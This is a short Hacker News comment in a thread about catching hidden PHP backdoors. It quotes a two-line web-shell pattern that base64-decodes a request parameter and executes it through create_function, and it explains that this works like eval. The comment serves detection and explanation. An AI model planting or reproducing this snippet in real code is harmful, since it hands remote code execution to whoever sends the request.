Hacker News new | past | comments | ask | show | jobs | submit login

Agree that is difficult to catch it. For the log, in this case there are both functions, the output looks something like this:

  $j6 = create_function('', base64_decode($_REQUEST['sort']));
  $j6(); // execution
The `create_function()`[1] will internally execute `eval()` so the result would be the same.

[1] http://php.net/create_function




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: